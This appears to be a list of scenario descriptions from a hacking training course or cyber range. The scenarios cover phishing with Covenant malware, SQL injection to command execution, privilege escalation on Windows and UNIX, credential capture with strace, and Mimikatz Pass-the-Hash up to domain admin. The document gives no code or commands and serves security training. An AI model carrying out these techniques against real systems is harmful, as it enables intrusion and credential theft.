Aricoma

The scenario focuses on obtaining information about the employees of a fictitious company. You will choose potential targets from them who might be more susceptible to socio-technical attacks. After creating a list of potential targets, it is then necessary to create a credible phishing campaign, i.e. to come up with an enticing email message. This message will contain malware generated by the Covenant tool. When successfully campaigned and executed, it will allow commands to be executed on the victim's station.

The scenario focuses on web applications and specifically the injection of SQL queries into untreated inputs. In this case the application is simple and it takes a minimum of time to reveal the vulnerability. In this task more emphasis is placed on vulnerability exploitation than on revealing vulnerabilities. First, it is necessary to discover the type and version of the DBMS, i.e., the type and version of the software that is used to manage the data. After discovering this information a job will come up to create a query that allows commands to be run on the vulnerable server.

The first step in this scenario (as in the real world) is the necessary enumeration of the software used. After determining the type and version used, the next step is to look for known vulnerabilities. There are many databases on the Internet containing exploits for vulnerable versions of software. After finding a potential exploit for a vulnerable version of the software we have identified, it is necessary to ascertain what is needed to exploit it, i.e., whether it is possible to exploit the vulnerability unauthenticated or whether it requires valid login data. In the end exploiting a publicly known vulnerability leads to the ability to execute any code remotely. In this scenario, the participant will learn to search for information that is publicly available on the Internet and will be able to use it.

The scenario’s task is to introduce an attacker to the options for privilege escalation on a regular Windows 10 user station. As always, the first step to success is system enumeration, i.e. what is running on the system, what is the configuration of services, the contents of directories and files. Fortunately, there is no need to do these tasks manually, as it is possible to use existing scripts that automate this process. Carrying out a system enumeration reveals the options for privilege escalation using an incorrectly configured service that the compromised user has the right to access. Once again the Covenant tool is used to exploit this vulnerability.

The scenario’s task is to familiarize you with the options for privilege escalation on UNIX-like systems. As always, the first step to success is system enumeration, i.e. what is running on the system, what is the configuration of services, the contents of directories and files. Fortunately, there is no need to do these tasks manually, as it is possible to use existing scripts that automate this process. The enumeration will reveal several potential options for privilege escalation. This scenario focuses on exploiting UNIX wildcards, that being by injecting additional parameters into a process that will run under the privileges of the highest privileged root user. The injected parameter will contain commands we have chosen, giving us the right to execute commands as the root user.

The scenario’s task is to familiarize you with the options for privilege escalation on UNIX-like systems. As always, the first step to success is system enumeration, i.e. what is running on the system, what is the configuration of services, the contents of directories and files. Fortunately, there is no need to do these tasks manually, as it is possible to use existing scripts that automate this process. The enumeration will reveal several potential options for privilege escalation. This scenario focuses on the manual analysis of executable files/scripts that, under certain circumstances, could lead to privilege escalation. The analysis first reveals the script’s functioning in detail and looks for a way, within the user's current permissions, to exploit the incorrectly written script code to subvert and execute your own code and thus gain root privileges.

The compromised server from the previous scenarios is integrated into the Active Directory environment and uses Kerberos authentication. The scenario assumes that the server is compromised (we have root user privileges) and is also integrated into the Windows domain, so it is likely that domain users will log on to it at some time. These users can use the SSH protocol as standard. As a root user, it is possible to use the strace tool to capture system calls to individual applications, including the sshd application that manages users’ SSH connections. Therefore, the task in this scenario is to capture login credentials and thus elevate your privileges to domain admin.

The compromised station from the previous scenarios is integrated into the Active Directory environment. In Windows, under certain conditions, users who log on to these systems have their password hashes (and sometimes even the passwords themselves) stored in the memory. By compromising the system, we have the highest privileges and can therefore read these hashes from the memory using the publicly known Mimikatz tool. What’s more, in the default setting, Windows systems allow a technique called Pass-the-Hash, where we can log in to the system with just knowing the password hash (it is not necessary to know the original password). In this scenario, your job is to extract the user's hashes from the memory and then use these hashes to compromise other systems using the Pass-the-Hash technique. The goal is to obtain the domain administrator’s hash/password, i.e. compromising the Windows domain.